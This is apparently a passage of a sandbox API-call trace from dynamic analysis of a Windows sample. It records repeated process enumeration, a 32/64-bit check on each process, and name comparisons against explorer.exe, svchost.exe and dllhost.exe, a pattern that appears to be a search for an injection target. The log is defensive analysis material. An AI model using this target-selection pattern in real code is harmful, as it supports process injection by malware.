Wow64Process=0x2cf764) returned 1 [0243.870] CloseHandle (hObject=0xec) returned 1 [0243.870] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0243.870] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0243.870] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0243.870] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0243.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0243.871] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.871] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.871] CloseHandle (hObject=0xec) returned 1 [0243.871] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0243.871] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0243.871] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0243.871] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0243.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0243.872] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.872] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.872] CloseHandle (hObject=0xec) returned 1 [0243.872] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0243.872] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0243.872] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0243.872] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0243.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0243.872] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.872] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.872] CloseHandle (hObject=0xec) returned 1 [0243.872] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0243.872] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0243.873] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0243.873] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0243.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0243.873] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.873] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.873] CloseHandle (hObject=0xec) returned 1 [0243.873] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0243.873] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0243.873] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0243.873] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0243.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0243.874] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.874] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.874] CloseHandle (hObject=0xec) returned 1 [0243.874] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0243.874] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0243.874] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0243.874] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0243.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0243.874] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.874] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.874] CloseHandle (hObject=0xec) returned 1 [0243.874] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0243.875] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0243.875] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0243.875] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0243.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0243.875] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.875] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.875] CloseHandle (hObject=0xec) returned 1 [0243.875] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0243.875] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0243.875] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0243.875] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0243.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0243.876] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.876] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.876] CloseHandle (hObject=0xec) returned 1 [0243.876] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0243.876] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0243.876] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0243.876] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0243.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0243.876] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.876] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.876] CloseHandle (hObject=0xec) returned 1 [0243.877] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0243.877] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0243.877] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0243.877] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0243.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0243.877] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.877] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.877] CloseHandle (hObject=0xec) returned 1 [0243.877] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0243.877] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0243.877] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0243.877] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0243.878] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0243.878] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.878] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.878] CloseHandle (hObject=0xec) returned 1 [0243.878] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0243.878] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0243.878] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0243.878] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0243.878] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0243.878] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.878] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.878] CloseHandle (hObject=0xec) returned 1 [0243.879] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0243.879] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0243.879] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0243.879] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0243.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0243.879] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.879] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.879] CloseHandle (hObject=0xec) returned 1 [0243.879] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0243.879] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0243.879] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0243.879] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0243.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0243.880] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.880] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.880] CloseHandle (hObject=0xec) returned 1 [0243.880] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0243.880] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0243.880] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0243.880] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0243.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0243.880] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0243.881] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0243.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0243.881] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0243.882] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0243.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0243.882] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0243.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0243.883] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.883] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.883] CloseHandle (hObject=0xec) returned 1 [0243.883] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0243.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0243.884] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.884] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.884] CloseHandle (hObject=0xec) returned 1 [0243.884] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0243.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0243.884] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0243.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0243.885] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.885] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.885] CloseHandle (hObject=0xec) returned 1 [0243.885] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0243.885] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0243.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0243.885] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.885] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.885] CloseHandle (hObject=0xec) returned 1 [0243.885] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0243.886] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0243.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0243.886] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.886] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.886] CloseHandle (hObject=0xec) returned 1 [0243.887] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0243.887] CloseHandle (hObject=0xe8) returned 1 [0243.887] Sleep (dwMilliseconds=0x3e8) [0244.898] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0244.899] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0244.900] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0244.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0244.900] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0244.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0244.901] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0244.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0244.901] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0244.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0244.902] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0244.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0244.902] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0244.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0244.903] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0244.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0244.903] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0244.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0244.904] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0244.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0244.904] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0244.905] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0244.905] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0244.906] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0244.906] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0244.906] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0244.907] OpenProcess 